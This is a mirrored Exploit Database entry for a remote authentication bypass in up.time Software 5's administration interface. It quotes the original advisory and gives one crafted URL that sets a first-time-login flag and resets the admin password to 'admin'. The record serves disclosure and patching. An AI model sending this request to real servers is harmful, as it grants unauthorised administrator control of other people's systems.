up.time Software 5 – Administration Interface Remote Authentication Bypass

• Exploit Database
• 128 阅读

• 作者： James Burton
  日期： 2011-04-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35668/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  source: https://www.securityfocus.com/bid/47599/info   up.time software is prone to a remote authentication-bypass vulnerability.   Attackers can exploit this issue to bypass authentication and perform unauthorized actions.   up.time 5 is vulnerable; other versions may also be affected.   http://www.example.com:9999/index.php?userid=admin &firstTimeLogin=True &password=admin &confirmPassword=admin &adminEmail=admin () admin &monitorEmail=admin () admin